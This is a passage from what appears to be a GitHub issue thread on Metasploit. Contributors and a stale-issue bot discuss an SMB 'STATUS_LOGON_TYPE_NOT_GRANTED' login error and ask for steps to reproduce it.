[-] SMB SessionError: STATUS_LOGON_TYPE_NOT_GRANTED(A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.)

[jeffmcjunkin]

Tagging @joswr1ght who has encountered this issue as well, and I think can replicate it at will.

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[jeffmcjunkin]

Beep boop, this issue isn't Stale. @joswr1ght, can you still replicate this?

[adfoster-r7]

The steps for enabling the flags/policies to get an account to trigger this error locally where Metasploit fails and other tools succeed would definitely be appreciated 💯

I'm still thinking it's something to do with network logins versus interactive logins, but I haven't looked at this since poking at it last